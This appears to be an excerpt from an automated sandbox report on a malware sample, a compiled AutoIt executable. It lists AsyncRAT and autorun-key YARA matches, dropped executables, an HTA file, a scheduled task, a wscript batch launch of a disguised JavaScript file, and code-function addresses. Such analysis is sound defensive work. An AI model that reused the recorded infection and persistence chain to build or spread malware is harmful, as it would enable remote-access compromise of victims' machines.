                                Source: 00000022.00000003.22738889698.0000000003CC3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                                Source: 0000001D.00000003.22728329557.0000000004991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                                Source: 0000001D.00000003.22728329557.0000000004991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                                Source: 00000022.00000003.22739207245.00000000013AD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                                Source: 00000022.00000003.22739207245.00000000013AD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                                Source: 0000001D.00000003.22787007755.00000000049AB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                                Source: 00000022.00000003.22739051213.00000000013AD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                                Source: 00000022.00000003.22739051213.00000000013AD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                                Source: 00000031.00000002.22834742123.0000000001402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                                Source: 00000022.00000003.22799002107.0000000001389000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                                Source: 00000022.00000003.22799002107.0000000001389000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                                Source: Process Memory Space: Macromedia.com PID: 3540, type: MEMORYSTRMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                                Source: Process Memory Space: AchillesGuard.com PID: 2308, type: MEMORYSTRMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                                Source: Process Memory Space: MSBuild.exe PID: 1884, type: MEMORYSTRMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                                Binary is likely a compiled AutoIt script file
                                Source: QkRFz2sau5.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                                Source: QkRFz2sau5.exe, 00000000.00000002.22057112305.0000000000A22000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_e037947a-0
                                Source: QkRFz2sau5.exe, 00000000.00000002.22057112305.0000000000A22000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_e34693bb-2
                                Source: QkRFz2sau5.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_204bd313-f
                                Source: QkRFz2sau5.exeString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_5d44fb17-f
                                Creates HTA files
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeFile created: C:\Users\user\AppData\Local\Temp\CB6Ixkrbm.htaJump to behavior
                                PE file contains section with special chars
                                Source: Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE.6.drStatic PE information: section name:
                                Source: Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE.6.drStatic PE information: section name: .idata
                                Source: Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE.6.drStatic PE information: section name:
                                Source: skotes.exe.11.drStatic PE information: section name:
                                Source: skotes.exe.11.drStatic PE information: section name: .idata
                                Source: skotes.exe.11.drStatic PE information: section name:
                                Source: random[1].exe0.14.drStatic PE information: section name:
                                Source: random[1].exe0.14.drStatic PE information: section name: .idata
                                Source: random[1].exe0.14.drStatic PE information: section name:
                                Source: 9c1024a1f1.exe.14.drStatic PE information: section name:
                                Source: 9c1024a1f1.exe.14.drStatic PE information: section name: .idata
                                Source: 9c1024a1f1.exe.14.drStatic PE information: section name:
                                Source: random[1].exe1.14.drStatic PE information: section name:
                                Source: random[1].exe1.14.drStatic PE information: section name: .idata
                                Source: random[1].exe1.14.drStatic PE information: section name:
                                Source: 935372fb1f.exe.14.drStatic PE information: section name:
                                Source: 935372fb1f.exe.14.drStatic PE information: section name: .idata
                                Source: 935372fb1f.exe.14.drStatic PE information: section name:
                                Source: random[2].exe2.14.drStatic PE information: section name:
                                Source: random[2].exe2.14.drStatic PE information: section name: .idata
                                Source: random[2].exe2.14.drStatic PE information: section name:
                                Source: c7f37422c5.exe.14.drStatic PE information: section name:
                                Source: c7f37422c5.exe.14.drStatic PE information: section name: .idata
                                Source: c7f37422c5.exe.14.drStatic PE information: section name:
                                Powershell drops PE file
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXEJump to dropped file
                                Windows Scripting host queries suspicious COM object (likely to drop second stage)
                                Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                                Wscript called in batch mode (surpress errors)
                                Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.js"
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess Stats: CPU usage > 6%
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_009CD5EB: CreateFileW,DeviceIoControl,CloseHandle,0_2_009CD5EB
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_009C1201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_009C1201
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_009CE8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_009CE8F6
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXEFile created: C:\Windows\Tasks\skotes.jobJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exeFile created: C:\Windows\SchedulesAb
                                Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exeFile created: C:\Windows\ContainsBefore
                                Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exeFile created: C:\Windows\TokenDetroit
                                Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exeFile created: C:\Windows\AttacksContacted
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_009D20460_2_009D2046
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_009680600_2_00968060
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_009C82980_2_009C8298
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_0099E4FF0_2_0099E4FF
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_0099676B0_2_0099676B
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_0098CAA00_2_0098CAA0
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_0096CAF00_2_0096CAF0
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_0097CC390_2_0097CC39
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_00996DD90_2_00996DD9
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_009691C00_2_009691C0
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_0097B1190_2_0097B119
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_009813940_2_00981394
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_009817060_2_00981706
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_0098781B0_2_0098781B
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_009819B00_2_009819B0
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_0097997D0_2_0097997D
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_00967A150_2_00967A15
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_00987A4A0_2_00987A4A
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_00987CA70_2_00987CA7
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_00981C770_2_00981C77
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_00999EEE0_2_00999EEE
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_009EBE440_2_009EBE44
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_00981F320_2_00981F32
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 14_2_0071886014_2_00718860
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 14_2_0071704914_2_00717049
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 14_2_007178BB14_2_007178BB
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 14_2_00712D1014_2_00712D10
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 14_2_006D4DE014_2_006D4DE0
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 14_2_007131A814_2_007131A8
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 14_2_00707F3614_2_00707F36
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 14_2_006D4B3014_2_006D4B30
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 14_2_0071779B14_2_0071779B
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeCode function: 15_3_00B8B02815_3_00B8B028
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeCode function: 15_3_00B947BC15_3_00B947BC
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeCode function: 15_3_00B947BC15_3_00B947BC
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeCode function: 15_3_00B947BC15_3_00B947BC
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeCode function: 15_3_00B947BC15_3_00B947BC
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeCode function: 15_3_00BA15E015_3_00BA15E0
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeCode function: 15_3_00BA15E015_3_00BA15E0
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeCode function: 15_3_00BA15E015_3_00BA15E0
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeCode function: 15_3_00BA15E015_3_00BA15E0
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeCode function: 15_3_00BA15E015_3_00BA15E0
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeCode function: 15_3_00BA15E015_3_00BA15E0
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeCode function: 15_3_00BA15E015_3_00BA15E0
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeCode function: 15_3_00BA15E015_3_00BA15E0
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeCode function: 15_3_00BA15E015_3_00BA15E0
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeCode function: 15_3_00BA15E015_3_00BA15E0
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeCode function: 15_3_00BA15E015_3_00BA15E0
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeCode function: 15_3_00BA15E015_3_00BA15E0
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeCode function: 15_3_059D5CC415_3_059D5CC4
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeCode function: 15_3_059D5CC415_3_059D5CC4
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeCode function: 15_3_059D5CC415_3_059D5CC4
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeCode function: 15_3_059D5CC415_3_059D5CC4
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeCode function: 15_3_059D5CC415_3_059D5CC4
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeCode function: 15_3_059D5CC415_3_059D5CC4
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeCode function: 15_3_059D5CC415_3_059D5CC4
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeCode function: 15_3_059D5CC415_3_059D5CC4
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeCode function: 15_3_059D5CC415_3_059D5CC4
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeCode function: 15_3_00BA15E015_3_00BA15E0
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeCode function: 15_3_00BA15E015_3_00BA15E0
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeCode function: 15_3_00BA15E015_3_00BA15E0
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeCode function: 15_3_00BA15E015_3_00BA15E0
                                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: String function: 00980A30 appears 46 times
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: String function: 0097F9F2 appears 40 times
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: String function: 00969CB3 appears 31 times
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6064 -s 936
                                Source: QkRFz2sau5.exe, 00000000.00000003.22054479480.0000000001440000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FV_ORIGINALFILENAME vs QkRFz2sau5.exe
                                Source: QkRFz2sau5.exe, 00000000.00000003.22054479480.0000000001440000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs QkRFz2sau5.exe
                                Source: QkRFz2sau5.exe, 00000000.00000003.22054245248.0000000001440000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FV_ORIGINALFILENAME vs QkRFz2sau5.exe
                                Source: QkRFz2sau5.exe, 00000000.00000003.22054245248.0000000001440000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs QkRFz2sau5.exe
                                Source: QkRFz2sau5.exe, 00000000.00000003.22056276089.0000000001300000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FV_ORIGINALFILENAME vs QkRFz2sau5.exe
                                Source: QkRFz2sau5.exe, 00000000.00000003.22055944034.0000000001300000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FV_ORIGINALFILENAME vs QkRFz2sau5.exe
                                Source: QkRFz2sau5.exe, 00000000.00000003.22053985812.0000000001440000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FV_ORIGINALFILENAME vs QkRFz2sau5.exe
                                Source: QkRFz2sau5.exe, 00000000.00000003.22053985812.0000000001440000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs QkRFz2sau5.exe
                                Source: QkRFz2sau5.exe, 00000000.00000003.22055788851.00000000012F3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FV_ORIGINALFILENAME vs QkRFz2sau5.exe
                                Source: QkRFz2sau5.exe, 00000000.00000003.22056516910.0000000001301000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FV_ORIGINALFILENAME vs QkRFz2sau5.exe
                                Source: QkRFz2sau5.exe, 00000000.00000002.22058116055.0000000001307000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FV_ORIGINALFILENAME vs QkRFz2sau5.exe
                                Source: QkRFz2sau5.exe, 00000000.00000003.22056586416.0000000001304000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FV_ORIGINALFILENAME vs QkRFz2sau5.exe
                                Source: QkRFz2sau5.exe, 00000000.00000003.22056200630.0000000001440000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FV_ORIGINALFILENAME vs QkRFz2sau5.exe
                                Source: QkRFz2sau5.exe, 00000000.00000003.22056200630.0000000001440000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs QkRFz2sau5.exe
                                Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                                Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                                Source: QkRFz2sau5.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                Source: 29.3.Macromedia.com.4985ad0.0.unpack, type: UNPACKEDPEMatched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
                                Source: 29.3.Macromedia.com.4985ad0.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                                Source: 29.3.Macromedia.com.4985ad0.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                                Source: 29.3.Macromedia.com.499e4c0.3.unpack, type: UNPACKEDPEMatched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
                                Source: 29.3.Macromedia.com.499e4c0.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                                Source: 29.3.Macromedia.com.499e4c0.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                                Source: 29.3.Macromedia.com.499e4c0.2.unpack, type: UNPACKEDPEMatched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
                                Source: 29.3.Macromedia.com.499e4c0.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                                Source: 29.3.Macromedia.com.499e4c0.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                                Source: 34.3.AchillesGuard.com.3c531d8.0.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
                                Source: 34.3.AchillesGuard.com.3c531d8.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                                Source: 34.3.AchillesGuard.com.3c531d8.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                                Source: 29.3.Macromedia.com.4985ad0.0.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
                                Source: 29.3.Macromedia.com.4985ad0.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                                Source: 29.3.Macromedia.com.4985ad0.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                                Source: 29.3.Macromedia.com.4985ad0.1.unpack, type: UNPACKEDPEMatched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
                                Source: 29.3.Macromedia.com.4985ad0.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                                Source: 29.3.Macromedia.com.4985ad0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                                Source: 34.3.AchillesGuard.com.1388a80.4.unpack, type: UNPACKEDPEMatched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
                                Source: 34.3.AchillesGuard.com.1388a80.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
